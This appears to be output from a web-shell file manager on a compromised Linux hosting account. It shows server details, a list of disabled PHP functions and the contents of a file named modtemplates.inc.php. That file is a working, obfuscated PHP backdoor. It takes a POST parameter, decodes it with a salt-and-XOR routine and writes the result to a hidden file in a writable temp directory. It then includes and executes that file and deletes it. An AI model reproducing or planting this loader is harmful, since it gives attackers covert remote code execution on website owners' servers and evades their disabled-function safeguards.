HEX
Server: Apache
System: Linux c040.dattaweb.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: c0400220 (20588)
PHP: 7.4.33
Disabled: system, shell, exec, system_exec, shell_exec, mysql_pconnect, passthru, popen, proc_open, proc_close, proc_nice, proc_terminate, proc_get_status, escapeshellarg, escapeshellcmd, eval, dl, imap_mail, libvirt_connect, gnupg_init, unsetenv, apache_setenv, pcntl_exec, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, opcache_get_status, opcache_reset, opcache_get_configuration
Upload Files
File: /home/c0400220/public_html/modtemplates.inc.php
<?php

if(!empty($_POST["\x66\x6Cag"])){
	$hld = $_POST["\x66\x6Cag"];
	 $hld=	  explode 	(  	".",	$hld		 ); 
	$mrk=	'';
            $salt=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=	strlen($salt);
    
            foreach ($hld as $i	=>		$v4) {$sChar=	ord($salt[$i%$lenS]);
                $dec=	((int)$v4 - $sChar - ($i%10))  ^		58;
                $mrk .=chr($dec);  }
	$res = array_filter([getenv("TMP"), "/tmp", getcwd(), ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), "/dev/shm"]);
	for ($marker = 0, $component = count($res); $marker < $component; $marker++) {
    $factor = $res[$marker];
    		if ((bool)is_dir($factor) && (bool)is_writable($factor)) {
    $ent = str_replace("{var_dir}", $factor, "{var_dir}/.reference");
    $success = file_put_contents($ent, $mrk);
if ($success) {
	include $ent;
	@unlink($ent);
	exit;}
}
}
}